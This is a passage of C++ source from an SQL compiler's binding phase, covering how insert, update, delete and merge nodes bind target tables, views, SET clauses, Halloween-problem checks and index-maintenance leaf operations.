bindWA->setNameLocListPtr(NULL); } // QSTUFF // Allocate a TableDesc and attach it to the node. // // Note that for Update/Delete, which always have a Scan node attached // (see below), we cannot reuse the Scan's TableDesc: // GenMapTable.C doesn't find the proper ValueIds when processing an // update/delete on a table with an index. // So we must always create a new (target) TableDesc, always a base table. // // Note that bindWA->getCurrentScope()->setRETDesc() is implicitly called: // 1) by createTableDesc, setting it to this new (target) base table; // 2) by bindView (if called), resetting it to the view's RenameTable RETDesc // atop the new (target) table. // const NATable *naTableTop = naTable; NABoolean isView = naTable->getViewText() != NULL; RelExpr *boundView = NULL; // ## delete when done with it? Scan *scanNode = NULL; if (getOperatorType() == REL_UNARY_INSERT || getOperatorType() == REL_LEAF_INSERT) { if (isView) { // INSERT into a VIEW: // // Expand the view definition as if it were a Scan child of the Insert // (like all children, must have its own table name scope). // bindWA->getCurrentScope()->xtnmStack()->createXTNM(); boundView = bindWA->bindView(getTableName(), naTable, accessOptions(), removeSelPredTree(), getGroupAttr()); #ifndef NDEBUG GU_DEBUG_Display(bindWA, this, "bv1", boundView); #endif if (bindWA->errStatus()) return this; scanNode = boundView->getScanNode(); bindWA->getCurrentScope()->xtnmStack()->removeXTNM(); } } else if (getOperatorType() == REL_UNARY_UPDATE || getOperatorType() == REL_UNARY_DELETE) { scanNode = getScanNode(); } if (updateCurrentOf()) { CMPASSERT(scanNode); scanNode->bindUpdateCurrentOf(bindWA, (getOperatorType() == REL_UNARY_UPDATE)); if (bindWA->errStatus()) return this; } // As previous comments indicated, we're creating a TableDesc for the target, // the underlying base table. Here we go and do it: NABoolean isScanOnDifferentTable = FALSE; if (isView) { // This binding of the view sets up the target RETDesc. // This is the first bindView for UPDATE and DELETE on a view, // and the second for INSERT into a view (yes, we *do* need to do it again). boundView = bindWA->bindView(getTableName(), naTable, accessOptions(), removeSelPredTree(), getGroupAttr(), TRUE); // QSTUFF setTableDesc(boundView->getScanNode()->getTableDesc()); if ((getOperatorType() == REL_INSERT)|| (getOperatorType() == REL_UNARY_INSERT) || (getOperatorType() == REL_LEAF_INSERT)) { ((Insert *)this)->setBoundView(boundView); } // for triggers if (scanNode) { const NATable *naTableLocal = scanNode->getTableDesc()->getNATable(); if ((naTableLocal != naTable) && (naTableLocal->getSpecialType() == ExtendedQualName::TRIGTEMP_TABLE)) isScanOnDifferentTable = TRUE; } } else if (NOT (getUpdateCKorUniqueIndexKey() && (getOperatorType() == REL_UNARY_INSERT))) { // an insert that is introduced to implement a phase of update primary key already // has the right tabledesc (obtained from the update that it is replacing), so // do not create another tablesdesc for such an insert. if (scanNode) naTable = scanNode->getTableDesc()->getNATable(); CorrName tempName(naTableTop->getTableName(), bindWA->wHeap(), "", getTableName().getLocationName(), getTableName().getPrototype()); tempName.setUgivenName(getTableName().getUgivenName()); tempName.setSpecialType(getTableName().getSpecialType()); // tempName.setIsVolatile(getTableName().isVolatile()); TableDesc * naTableToptableDesc = bindWA->createTableDesc( naTableTop, tempName); if(naTableToptableDesc) { naTableToptableDesc->setSelectivityHint(NULL); naTableToptableDesc->setCardinalityHint(NULL); } setTableDesc(naTableToptableDesc); // Now naTable has the Scan's table, and naTableTop has the GU's table. isScanOnDifferentTable = (naTable != naTableTop); } if (bindWA->errStatus()) return this; // QSTUFF // in case of a delete or update we may have to bind set clauses. // first we bind the left target column, second we bind the right hand side // we also have to separate the set on rollback clauses in a separate // list. The set clauses generate a newRecExpr list, the set on rollback // clause generate a newRecBeforeExpr list. // we add the old to new valueid map as it allows us to generate // a subset operator in the presence of order by. the compiler // needs to understand that the old and new valueids are identical // inlined trigger may update and scan different tables if ((getOperatorType() == REL_UNARY_DELETE) && (!isScanOnDifferentTable && !getUpdateCKorUniqueIndexKey())) { const ValueIdList &dkeys = getTableDesc()->getClusteringIndex()->getClusteringKeyCols(); const ValueIdList &skeys = scanNode->getTableDesc()->getClusteringIndex()->getClusteringKeyCols(); CollIndex j = skeys.entries(); for (CollIndex i = 0; i < j; i++) { oldToNewMap().addMapEntry(skeys[i].getItemExpr()->getValueId(), dkeys[i].getItemExpr()->getValueId()); } } ItemExpr *recExpr = removeNewRecExprTree(); if (recExpr && (getOperatorType() == REL_UNARY_DELETE || getOperatorType() == REL_UNARY_UPDATE)) { ItemExprList recList(recExpr, bindWA->wHeap()); ItemExprList recBeforeList(bindWA->wHeap()); SET(short) stoiColumnSet(bindWA->wHeap()); // in case a delete statement has a recEpxr, set on rollback // clauses have been defined and need to be bound // as part of binding any set on rollback clause we have check // that no contraints are defined for the specific clauses; otherwise // the statement is rejected. // the target columns are bound to the update table, the source // columns are bound to the scan table if (getOperatorType() == REL_UNARY_DELETE){ recBeforeList.insert(recList); bindUpdateExpr(bindWA,recExpr,recBeforeList,boundView,scanNode,stoiColumnSet,TRUE); if (bindWA->errStatus()) return this; } // in case of an update operator we have to separate the set and // set on rollback clauses if (getOperatorType() == REL_UNARY_UPDATE) { CMPASSERT(recList.entries()); NABoolean leftIsList = FALSE; NABoolean rightIsList = FALSE; NABoolean legalSubqUdfExpr = FALSE; for (CollIndex i = 0;i < recList.entries(); i++){ CMPASSERT(recList[i]->getOperatorType() == ITM_ASSIGN); if (recList[i]->child(0)->getOperatorType() == ITM_ITEM_LIST) leftIsList = TRUE; if (recList[i]->child(1)->getOperatorType() == ITM_ITEM_LIST) rightIsList = TRUE; if (((Assign *)recList[i])->onRollback()){ // On rollback clause currently not allowed with update lists. if ((leftIsList) || (rightIsList)) { *CmpCommon::diags() << DgSqlCode(-3242) << DgString0(" ON ROLLBACK not supported with SET lists."); bindWA->setErrStatus(); return this; } // CMPASSERT((NOT leftIsList) && (NOT rightIsList)) recBeforeList.insert(recList[i]); recList.removeAt(i); i--; } } if ((leftIsList) && (NOT rightIsList) && (recList.entries() == 1) && ((recList[0]->child(1)->getOperatorType() == ITM_ROW_SUBQUERY) || (recList[0]->child(1)->getOperatorType() == ITM_USER_DEF_FUNCTION))) { ItemExpr * expr = NULL; // Both Subqueries and UDFs are now using the ValueIdProxy // to carry the each of the valueIds representing the select list // or UDF outputs. The transformation of the ValueIdProxy will do the // right thing, and we don't need setSubqInUpdateAssing() anymore. // Bind the subquery if (recList[0]->child(1)->getOperatorType() == ITM_ROW_SUBQUERY) { RowSubquery * rs = (RowSubquery*)(recList[0]->child(1)->castToItemExpr()); // Not sure that we ever have a subquery without a REL_ROOT // left this additional check from the old code. if (rs->getSubquery()->getOperatorType() == REL_ROOT) { rs = (RowSubquery *) rs->bindNode(bindWA); if (bindWA->errStatus()) return this; legalSubqUdfExpr = TRUE; expr = (ItemExpr *) rs; } } else { UDFunction * rudf = (UDFunction*)(recList[0]->child(1)->castToItemExpr()); // Need to bind the UDFunction to get its outputs. rudf = (UDFunction *) rudf->bindNode(bindWA); if (bindWA->errStatus()) return this; legalSubqUdfExpr = TRUE; expr = (ItemExpr *) rudf; } // Update the recList with the bound itemExpr recList[0]->child(1) = expr; // Use the ItemExprList to flatten the Subquery or UDF ItemExprList *exprList = (ItemExprList *) new(bindWA->wHeap()) ItemExprList(expr,bindWA->wHeap()); // Convert the ItemExprList to a Tree ItemExpr * ie = exprList->convertToItemExpr(); ie = ie->bindNode(bindWA); if (bindWA->errStatus()) return this; Assign * assignNode = (Assign *)recList[0]; assignNode->child(1) = ie; rightIsList = TRUE; } if ((leftIsList) || (rightIsList)) // some elements as lists { ItemExprList newRecList(bindWA->wHeap()); for (CollIndex i = 0; i < recList.entries(); i++) { Assign * assignNode = (Assign *)recList[i]; // Need to bind any UDFs or Subqieries in the expression // so that we know the degree before we expand the list. assignNode->child(0) = assignNode->child(0)->bindUDFsOrSubqueries(bindWA); if (bindWA->errStatus()) return this; // Need to bind any UDFs or Subqieries in the expression // so that we know the degree before we expand the list. assignNode->child(1) = assignNode->child(1)->bindUDFsOrSubqueries(bindWA); if (bindWA->errStatus()) return this; ItemExprList leftList(assignNode->child(0), bindWA->wHeap()); ItemExprList rightList(assignNode->child(1), bindWA->wHeap()); Lng32 numLeftElements = (Lng32) leftList.entries(); Lng32 numRightElements = (Lng32) rightList.entries(); // See if ALLOW_SUBQ_IN_SET is enabled. It is enabled if // the default is ON, or if the default is SYSTEM and // ALLOW_UDF is ON. NABoolean allowSubqInSet_Enabled = FALSE; DefaultToken allowSubqTok = CmpCommon::getDefault(ALLOW_SUBQ_IN_SET); if ((allowSubqTok == DF_ON) || (allowSubqTok == DF_SYSTEM)) allowSubqInSet_Enabled = TRUE; if (!allowSubqInSet_Enabled) { for (CollIndex j = 0; j < rightList.entries(); j++) { if (((numLeftElements > 1) || (numRightElements > 1)) && (((rightList[j]->getOperatorType() == ITM_ROW_SUBQUERY) || (rightList[j]->getOperatorType() == ITM_VALUEID_PROXY)) && (legalSubqUdfExpr == FALSE))) { *CmpCommon::diags() << DgSqlCode(-3242) << DgString0(" Multiple elements or multiple subqueries are not allowed in this SET clause."); bindWA->setErrStatus(); return this; } } } if (numLeftElements != numRightElements) { *CmpCommon::diags() << DgSqlCode(-4023) << DgInt0(numRightElements) << DgInt1(numLeftElements); bindWA->setErrStatus(); return this; } // create newRecList with one Assign node for each element. for (CollIndex k = 0; k < leftList.entries(); k++) { ItemExpr * leftIE = leftList[k]; ItemExpr * rightIE = rightList[k]; Assign *assign = new (bindWA->wHeap()) Assign(leftIE, rightIE); // We do not bind the above Assign as it will be done // in bindUpdateExpr below. (bug #1893) newRecList.insert(assign); } } // for bindUpdateExpr(bindWA,recExpr,newRecList,boundView,scanNode,stoiColumnSet); if (bindWA->errStatus()) return this; } // some elements as lists else { // no elements as lists if (recList.entries()){ bindUpdateExpr(bindWA,recExpr,recList,boundView,scanNode,stoiColumnSet); if (bindWA->errStatus()) return this; } } if (recBeforeList.entries()){ bindUpdateExpr(bindWA,recExpr,recBeforeList,boundView,scanNode,stoiColumnSet,TRUE); if (bindWA->errStatus()) return this; } } // UNARY_UPDATE // now we record the columns updated for the SqlTableOpenInfo if (listedStoi) { listedStoi->getStoi()->setColumnListCount((short)stoiColumnSet.entries()); short *stoiColumnList = new (bindWA->wHeap()) short[stoiColumnSet.entries()]; for (CollIndex i = 0; i < stoiColumnSet.entries(); i++) { stoiColumnList[i] = stoiColumnSet[i]; listedStoi->addUpdateColumn(stoiColumnSet[i]); } listedStoi->getStoi()->setColumnList(stoiColumnList); } // the previous implementation assumed that the scope points // to the scan table; we don't want to disturb the code and // make that happen -- #ifndef NDEBUG GU_DEBUG_Display(bindWA, this, "u"); #endif bindWA->getCurrentScope()->setRETDesc(getRETDesc()); } // QSTUFFF CollIndex endSrcUsgIx = bindWA->tableViewUsageList().entries(); if ((!isScanOnDifferentTable) && (((getOperatorType() == REL_UNARY_INSERT) && !insertFromValuesList && !getGroupAttr()->isEmbeddedInsert()) || (getOperatorType() == REL_UNARY_UPDATE) || (getOperatorType() == REL_UNARY_DELETE))){ // Special handling of statements that could suffer the // Halloween problem, e.g., "insert into t select from t" // or "insert into v select from t", if v references t DBG( if (getenv("TVUSG_DEBUG")) bindWA->tableViewUsageList().display(); ) const NATable *naTableBase = naTable; const QualifiedName *viewName = NULL; if (isView) { // Currently, per Ansi rules, we can only insert through a view if // there is a single underlying base table without joins or unions. // Since we are binding the view twice for INSERTS, // the variable beforeRefcount for the *single* base table has to be 2. // beforeRefcount = beforeRefcount + 1; naTableBase = getTableDesc()->getNATable(); viewName = &naTable->getTableName(); } if ((getOperatorType() == REL_UNARY_UPDATE || getOperatorType() == REL_UNARY_DELETE) && (child(0)->getOperatorType() == REL_SCAN)) { // The table is referenced twice; once for the update/delete and // the second time for the scan below it. beforeRefcount = beforeRefcount + 1; } const QualifiedName &tableBaseName = naTableBase->getTableName(); Int32 afterRefcount = naTableBase->getReferenceCount(); NABoolean isSGTableType = getTableName().getSpecialType() == ExtendedQualName::SG_TABLE; NAString viewFmtdList(bindWA->wHeap()); Int32 baseSeenInSrc = 0; // The views on the table do not need to be obtained // if the table type is a SEQUENCE GENERATOR if (!isSGTableType) baseSeenInSrc = bindWA->tableViewUsageList().getViewsOnTable( begSrcUsgIx, endSrcUsgIx, bindWA->viewCount(), tableBaseName, getTableName().getSpecialType(), viewName, viewFmtdList); NABoolean halloween = FALSE; if (CmpCommon::getDefault(R2_HALLOWEEN_SUPPORT) == DF_ON) { if (beforeRefcount != afterRefcount) { // Check to see if we can support this update. // if(checkForHalloweenR2(afterRefcount - beforeRefcount)) { halloween = TRUE; } } else { Scan *scanSrc = getScanNode(FALSE/*no assert*/); if ((baseSeenInSrc > beforeRefcount) && ((scanSrc && scanSrc->getTableName().isLocationNameSpecified())|| (getTableName().isLocationNameSpecified()))) { halloween = TRUE; } if (Get_SqlParser_Flags(ALLOW_SPECIALTABLETYPE)) { if ((scanSrc && scanSrc->getTableName().isLocationNameSpecified())|| (getTableName().isLocationNameSpecified())){ // Do not enforce Halloween check if it is a // partition only operation. // We assume the programmer knows what he's doing // -- hopefully, by doing insert/update/delete // operations as part of Partition Management // (Move Partition Boundary or Split Partition or // Merge Partition. See TEST057 and TEST058) halloween = FALSE; } } } if (halloween) { CMPASSERT(!(isView && viewFmtdList.isNull())); *CmpCommon::diags() << DgSqlCode(viewFmtdList.isNull() ? -4026 : -4060) << DgTableName( tableBaseName.getQualifiedNameAsAnsiString()) << DgString0(viewFmtdList); bindWA->setErrStatus(); return this; } } else { // Support for self-referencing updates/Halloween problem. if (beforeRefcount != afterRefcount) { setAvoidHalloween(TRUE); bindWA->getTopRoot()->setAvoidHalloween(TRUE); // Decide if access mode (default or specified) is compatible // with the use of DP2 locks. If access mode was specified, // it is a property of the naTableBase. NABoolean cannotUseDP2Locks = naTableBase->getRefsIncompatibleDP2Halloween(); // Now check the transaction isolation level, which can override // the access mode. Note that il was initialized above for the // check for an updatable trans, i.e., errors 3140 and 3141. if((CmpCommon::transMode()->ILtoAT(il) == REPEATABLE_ ) || (CmpCommon::transMode()->ILtoAT(il) == STABLE_ ) || (CmpCommon::transMode()->ILtoAT(il) == BROWSE_ )) cannotUseDP2Locks = TRUE; // Save the result with this GenericUpdate object. It will be // used when the nextSubstitute methods of TSJFlowRule or TSJRule // call GenericUpdate::configTSJforHalloween. if (NOT getHalloweenCannotUseDP2Locks()) setHalloweenCannotUseDP2Locks(cannotUseDP2Locks); // Keep track of which table in the query is the self-ref table. // This is a part of the fix for solution 10-071204-9253. ((NATable *)naTableBase)->setIsHalloweenTable(); } else { Scan *scanSrc = getScanNode(FALSE/*no assert*/); if ((baseSeenInSrc > beforeRefcount) && ((scanSrc && scanSrc->getTableName().isLocationNameSpecified())|| (getTableName().isLocationNameSpecified()))) { halloween = TRUE; } if (Get_SqlParser_Flags(ALLOW_SPECIALTABLETYPE)) { if ((scanSrc && scanSrc->getTableName().isLocationNameSpecified())|| (getTableName().isLocationNameSpecified())){ // Do not enforce Halloween check if it is a // partition only operation. // We assume the programmer knows what he's doing // -- hopefully, by doing insert/update/delete // operations as part of Partition Management // (Move Partition Boundary or Split Partition or // Merge Partition. See TEST057 and TEST058) halloween = FALSE; } } if (halloween) { CMPASSERT(!(isView && viewFmtdList.isNull())); *CmpCommon::diags() << DgSqlCode(viewFmtdList.isNull() ? -4026 : -4060) << DgTableName( tableBaseName.getQualifiedNameAsAnsiString()) << DgString0(viewFmtdList); bindWA->setErrStatus(); return this; } } } } // Bind the base class. // Allocate an empty RETDesc and attach it to this node, *but* leave the // currently scoped RETDesc (that of naTableTop) as is, for further binding // in caller Insert::bindNode or LeafInsert/LeafDelete::bindNode. // RelExpr *boundExpr = bindSelf(bindWA); CMPASSERT(boundExpr == this); // assumed by RETDesc/RI/IM code below if (bindWA->errStatus()) return boundExpr; setRETDesc(new (bindWA->wHeap()) RETDesc(bindWA)); // Copy the check constraints to the private memory of the GenericUpdate. // checkConstraints() = getTableDesc()->getCheckConstraints(); // Create a key expression for the table to be updated. // The code specific to the Insert node is handled in Insert::bindNode. // if (getOperatorType() == REL_UNARY_UPDATE || getOperatorType() == REL_UNARY_DELETE) { // SQL syntax requires (and the parser ensures) that a direct descendant // (passing thru views) of an update/delete node is a scan node on the // same table that is being updated (note that normalizer transformations // may change this at a later time). // An exception to this rule happens when before triggers are inlined. // In this case, the update/delete on the subject table is driven by // a Scan on a temp table. The primary key columns of the subject table are // a subset of the primary key columns of the temp table, and using the // same column names, but not neccessarily in the same order. // // Update/Delete nodes require expressions in their newRecExpr that can // be used to form the primary key of the table to update/delete. // const NAColumnArray &keyColArray = getTableDesc()->getNATable()->getClusteringIndex()->getIndexKeyColumns(); CollIndex numKeyCols = keyColArray.entries(); const NAColumnArray &scanColArray = scanNode->getTableDesc()->getNATable()->getNAColumnArray(); for (CollIndex i = 0; i < numKeyCols; i++) { // The scan node and the update/delete node both use the SAME table, // so their column names are also the same. // Lng32 colPos = keyColArray[i]->getPosition(); ItemExpr *guCol = getTableDesc()->getColumnList()[colPos].getItemExpr(); ItemExpr *scanCol; // - Triggers if (!isScanOnDifferentTable) scanCol = scanNode->getTableDesc()->getColumnList()[colPos].getItemExpr(); else { // Make sure this is a BaseColumn. CMPASSERT(guCol->getOperatorType() == ITM_BASECOLUMN); // Find the column name. const NAString& colName = ((BaseColumn *)guCol)->getColName(); // Find a column with the same name, in the table from the Scan node. // SYSKEY is an exception since its name in the temp table is "@SYSKEY" ExtendedQualName::SpecialTableType tableType = scanNode->getTableDesc()->getCorrNameObj().getSpecialType(); NAColumn *scanNaCol = NULL; if (ExtendedQualName::TRIGTEMP_TABLE == tableType && colName == "SYSKEY") { scanNaCol = scanColArray.getColumn("@SYSKEY"); } else { scanNaCol = scanColArray.getColumn(colName); } CMPASSERT(scanNaCol != NULL) // Get the position of this column in the Scan table. Lng32 scanColPos = scanNaCol->getPosition(); // Get the Scan BaseColumn. scanCol = scanNode->getTableDesc()->getColumnList()[scanColPos].getItemExpr(); } ItemExpr *newKeyPred = new (bindWA->wHeap()) BiRelat(ITM_EQUAL, guCol, scanCol); newKeyPred->bindNode(bindWA); beginKeyPred().insert(newKeyPred->getValueId()); updateToSelectMap().addMapEntry( newKeyPred->child(0)->getValueId(), newKeyPred->child(1)->getValueId()); } // loop over key columns // All of the indexes also require expressions that can be used to // form the primary key of the index to update/delete. Create these // item expressions here. // (From here to the end of the loop over indexes structurally resembles // GenericUpdate::imBindAllIndexes(), but has significant differences.) // // Remember the value ID's of the scan node index columns for // code generation time. // if ((this->getOperatorType() == REL_UNARY_UPDATE) && isScanOnDifferentTable) { setScanIndexDesc(NULL); // for triggers } else { setScanIndexDesc(scanNode->getTableDesc()->getClusteringIndex()); } } // REL_UNARY_UPDATE or REL_UNARY_DELETE // QSTUFF // we need to check whether this code is executed as part of a create view // ddl operation using bindWA->inDDL() and prevent indices, contraints and // triggers to be added as the catalog manager binding functions cannot // handle it right now // QSTUFF // QSTUFF hack ! if (getGroupAttr()->isEmbeddedUpdate()) bindWA->setNameLocListPtr(pLoc); bindWA->setInGenericUpdate(inGenericUpdate); // QSTUFF // set flag that we are binding an Insert/Update/Delete operation // Used to disable Join optimization when necessary bindWA->setBindingIUD(); return boundExpr; } // GenericUpdate::bindNode() NABoolean GenericUpdate::checkForMergeRestrictions(BindWA *bindWA) { if (!isMerge()) return FALSE; ValueIdList tempVIDlist; getTableDesc()->getIdentityColumn(tempVIDlist); NAColumn *identityCol = NULL; if (tempVIDlist.entries() > 0) { ValueId valId = tempVIDlist[0]; identityCol = valId.getNAColumn(); } // MERGE on a table with BLOB columns is not supported if (getTableDesc()->getNATable()->hasLobColumn()) { *CmpCommon::diags() << DgSqlCode(-3241) << DgString0(" LOB column not allowed."); bindWA->setErrStatus(); return TRUE; } if (getTableDesc()->hasUniqueIndexes() && (CmpCommon::getDefault(MERGE_WITH_UNIQUE_INDEX) == DF_OFF)) { *CmpCommon::diags() << DgSqlCode(-3241) << DgString0(" unique indexes not allowed."); bindWA->setErrStatus(); return TRUE; } if ((accessOptions().accessType() == SKIP_CONFLICT_) || (getGroupAttr()->isStream()) || (newRecBeforeExprArray().entries() > 0)) // set on rollback { *CmpCommon::diags() << DgSqlCode(-3241) << DgString0(" Stream, skip conflict or SET ON ROLLBACK not allowed."); bindWA->setErrStatus(); return TRUE; } if (getGroupAttr()->isEmbeddedUpdateOrDelete()) { *CmpCommon::diags() << DgSqlCode(-3241) << DgString0(" Embedded update/deletes not allowed."); bindWA->setErrStatus(); return TRUE; } if ((getInliningInfo().hasInlinedActions()) || (getInliningInfo().isEffectiveGU())) { if (getInliningInfo().hasTriggers()) { *CmpCommon::diags() << DgSqlCode(-3241) << DgString0(" Triggers not allowed."); bindWA->setErrStatus(); return TRUE; } } return FALSE; } // This class LeafInsert and its companion LeafDelete // are currently used only by Index Maintenance, // but we ought not make any assumptions. // ##IM: It might be useful to add a flag such as GenericUpdate::isIndexTable_ // ##IM: and set it to TRUE in createIMNode(). // RelExpr *LeafInsert::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } #ifndef NDEBUG if (GU_DEBUG) cerr << "\nLeafInsert " << getUpdTableNameText() << endl; #endif setInUpdateOrInsert(bindWA, this, REL_INSERT); if (getPreconditionTree()) { ValueIdSet pc; getPreconditionTree()->convertToValueIdSet(pc, bindWA, ITM_AND); if (bindWA->errStatus()) return this; setPreconditionTree(NULL); setPrecondition(pc); } RelExpr *boundExpr = GenericUpdate::bindNode(bindWA); if (bindWA->errStatus()) return boundExpr; // Make newRecExprArray_ be an ordered set of assign nodes of the form // "ixcol1 = basetblcol1, ixcol2 = basecol2, ..." (for Index Maintenance) // Note: For SQL/MP tables, ixcol0 is the keytag, and will need to be // handled differently from other columns. const ValueIdList &tgtcols = getTableDesc()->getColumnList(); CMPASSERT(tgtcols.entries() == baseColRefs().entries()); for (CollIndex i = 0; i < tgtcols.entries(); i++) { Assign *assign; assign = new (bindWA->wHeap()) Assign(tgtcols[i].getItemExpr(), baseColRefs()[i], FALSE); assign->bindNode(bindWA); if (bindWA->errStatus()) return NULL; newRecExprArray().insertAt(i, assign->getValueId()); newRecExpr().insert(assign->getValueId()); updateToSelectMap().addMapEntry(assign->getTarget(), assign->getSource()); } // RelExpr::bindSelf (in GenericUpdate::bindNode) has done this line, but now // any outer refs discovered in bindNode's in the above loop must be added. // For Index Maintenance, these must be exactly the set of baseColRefs vids // (all the target index cols are from the locally-scoped RETDesc left by // the GenericUpdate::bindNode). getGroupAttr()->addCharacteristicInputs(bindWA->getCurrentScope()->getOuterRefs()); // The NATable of getTableName() had been set to INDEX_TABLE so that // getNATable would search the right namespace. // Now we make the Optimizer treat this as a regular table, not an index // (in particular, don't have it choose VSBB sidetree-insert). // // The TableDesc setting may be redundant/unnecessary, but we do it // for completeness and safety. // // -- Triggers // If it is NOT an index table (like maybe a TRIGTEMP_TABLE), leave it alone if (getTableName().getSpecialType() == ExtendedQualName::INDEX_TABLE) { getTableName().setSpecialType(ExtendedQualName::NORMAL_TABLE); getTableDesc()->getCorrNameObj().setSpecialType(ExtendedQualName::NORMAL_TABLE); } setInUpdateOrInsert(bindWA); return boundExpr; } // LeafInsert::bindNode() RelExpr *LeafDelete::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } #ifndef NDEBUG if (GU_DEBUG) cerr << "\nLeafDelete " << getUpdTableNameText() << endl; #endif if (getPreconditionTree()) { ValueIdSet pc; getPreconditionTree()->convertToValueIdSet(pc, bindWA, ITM_AND); if (bindWA->errStatus()) return this; setPreconditionTree(NULL); setPrecondition(pc); } RelExpr *boundExpr = GenericUpdate::bindNode(bindWA); if (bindWA->errStatus()) return boundExpr; //Set the beginKeyPred if (TriggersTempTable *tempTableObj = getTrigTemp()) { const ValueIdList &keycols = getTableDesc()->getClusteringIndex()->getIndexKey(); ItemExpr *keyExpr; // Normal case - use the UniqueExecuteId builtin function. keyExpr = new(bindWA->wHeap()) UniqueExecuteId(); ItemExpr *tempKeyPred = new(bindWA->wHeap()) BiRelat(ITM_EQUAL, keycols[0].getItemExpr(), keyExpr); tempKeyPred->bindNode(bindWA); if (bindWA->errStatus()) return NULL; beginKeyPred().insert(tempKeyPred->getValueId()); // Create the ItemExpr for the constant UniqueIudNum ItemExpr *col2 = new(bindWA->wHeap()) ColReference(new(bindWA->wHeap()) ColRefName(UNIQUEIUD_COLUMN)); // Compare it to the correct offset. BindWA::uniqueIudNumOffset offset = BindWA::uniqueIudNumForInsert ; ItemExpr *iudConst = new(bindWA->wHeap()) ConstValue(bindWA->getUniqueIudNum(offset)); ItemExpr *predIudId = new(bindWA->wHeap()) BiRelat(ITM_EQUAL, keycols[1].getItemExpr(), iudConst); predIudId->bindNode(bindWA); if (bindWA->errStatus()) return NULL; beginKeyPred().insert(predIudId->getValueId()); for (CollIndex i = 2; i<keycols.entries(); i++) { ItemExpr *keyPred = NULL; ItemExpr *keyItemExpr = keycols[i].getItemExpr(); ItemExpr *baseItemExpr = NULL; Lng32 keyColPos = keycols[i].getNAColumn()->getPosition(); baseItemExpr = baseColRefs()[keyColPos]; keyPred = new (bindWA->wHeap()) BiRelat(ITM_EQUAL, keyItemExpr, baseItemExpr); keyPred->bindNode(bindWA); if (bindWA->errStatus()) return NULL; beginKeyPred().insert(keyPred->getValueId()); } } else { const ValueIdList &keycols = getTableDesc()->getClusteringIndex()->getIndexKey(); for (CollIndex i = 0; i < keycols.entries() ; i++) { ItemExpr *keyPred = 0; ItemExpr *keyItemExpr = keycols[i].getItemExpr(); Lng32 keyColPos = keycols[i].getNAColumn()->getPosition(); ItemExpr *baseItemExpr = NULL; // For a unique index (for undo) we are passing in all the index // columns in baseColRefs. So we need to find the index key col // position in the index col list and compare the key columns with // it's corresponding column in the index column list if (isUndoUniqueIndex()) baseItemExpr = baseColRefs()[keyColPos]; else baseItemExpr = baseColRefs()[i]; keyPred = new (bindWA->wHeap()) BiRelat(ITM_EQUAL, keyItemExpr, baseItemExpr); keyPred->bindNode(bindWA); if (bindWA->errStatus()) return NULL; beginKeyPred().insert(keyPred->getValueId()); } } if (isUndoUniqueIndex()) { setUpExecPredForUndoUniqueIndex(bindWA) ; } if (getTrigTemp()) { setUpExecPredForUndoTempTable(bindWA); } // See LeafInsert::bindNode for comments on remainder of this method. getGroupAttr()->addCharacteristicInputs(bindWA->getCurrentScope()->getOuterRefs()); getTableName().setSpecialType(ExtendedQualName::NORMAL_TABLE); getTableDesc()->getCorrNameObj().setSpecialType(ExtendedQualName::NORMAL_TABLE); return boundExpr; } // LeafDelete::bindNode() void LeafDelete::setUpExecPredForUndoUniqueIndex(BindWA *bindWA) { // Set up the executor predicate . Used in the case of Undo to undo the // exact row that caused an error.Note that if we used only the key // columns to undo, we may end up undoing existing rows . // This is done only for unique indexes ItemExpr *execPred = NULL; const ValueIdList &indexCols = getTableDesc()->getClusteringIndex()->getIndexColumns(); for ( CollIndex i = 0; i < indexCols.entries(); i++) { execPred = new (bindWA->wHeap()) BiRelat(ITM_EQUAL, indexCols[i].getItemExpr(), baseColRefs()[i]); execPred->bindNode(bindWA); if (bindWA->errStatus()) return ; executorPred() += execPred->getValueId(); } return; } void LeafDelete::setUpExecPredForUndoTempTable(BindWA *bindWA) { ItemExpr *execPred = NULL; const ValueIdList &tempCols = getTableDesc()->getClusteringIndex()->getIndexColumns(); for ( CollIndex i = 0; i < tempCols.entries(); i++) { NAString colName(tempCols[i].getNAColumn()->getColName()); if (colName.data()[0] == '@' && colName.compareTo("@SYSKEY")) continue; execPred = new (bindWA->wHeap()) BiRelat(ITM_EQUAL, tempCols[i].getItemExpr(), baseColRefs()[i]); execPred->bindNode(bindWA); if (bindWA->errStatus()) return; executorPred() += execPred->getValueId(); } return; } // ----------------------------------------------------------------------- // RelRoutine // ----------------------------------------------------------------------- // LCOV_EXCL_START - rfi RelExpr *RelRoutine::bindNode(BindWA *bindWA) { CMPASSERT(0); // For the time being, all classes above implement their own. // // Allocate an RETDesc and attach it to this and the BindScope. // Needs to occur in later classes when we know if we are at table // type or not.. // XXX setRETDesc(new (bindWA->wHeap()) RETDesc(bindWA, getTableDesc())); // bindWA->getCurrentScope()->setRETDesc(getRETDesc()); // // Bind the base class. // RelExpr *boundExpr = bindSelf(bindWA); if (bindWA->errStatus()) return boundExpr; // // Assign the set of columns that belong to the virtual table // as the output values that can be produced by this node. // // XXX done in later clasees // getGroupAttr()->addCharacteristicOutputs(getTableDesc()->getColumnList()); return boundExpr; } // RelRoutine::bindNode() // LCOV_EXCL_STOP // ----------------------------------------------------------------------- // BuiltinTableValuedFunction // will be called by // ExplainFunc and StatisticsFunc // Rely on function implementation in TableValuedFunction // ----------------------------------------------------------------------- // ----------------------------------------------------------------------- // Explain/Statistics/HiveMD Func // ----------------------------------------------------------------------- RelExpr *BuiltinTableValuedFunction::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // // Bind the child nodes. // bindChildren(bindWA); if (bindWA->errStatus()) return this; // // Check if there is already an NATable for the Explain/Statistics table. // if (getOperatorType() == REL_EXPLAIN || getOperatorType() == REL_STATISTICS || getOperatorType() == REL_HIVEMD_ACCESS || getOperatorType() == REL_HBASE_ACCESS) { NATable *naTable = NULL; if (getOperatorType() == REL_HBASE_ACCESS) { // should not reach here CMPASSERT(0); } else { CorrName corrName(getVirtualTableName()); corrName.setSpecialType(ExtendedQualName::VIRTUAL_TABLE); NATable *naTable = bindWA->getSchemaDB()->getNATableDB()-> get(&corrName.getExtendedQualNameObj()); if (NOT naTable) { desc_struct *tableDesc = createVirtualTableDesc(); if (tableDesc) naTable = bindWA->getNATable(corrName, FALSE/*catmanUsages*/, tableDesc); if ( ! tableDesc || bindWA->errStatus() ) return this; } // Allocate a TableDesc and attach it to this. 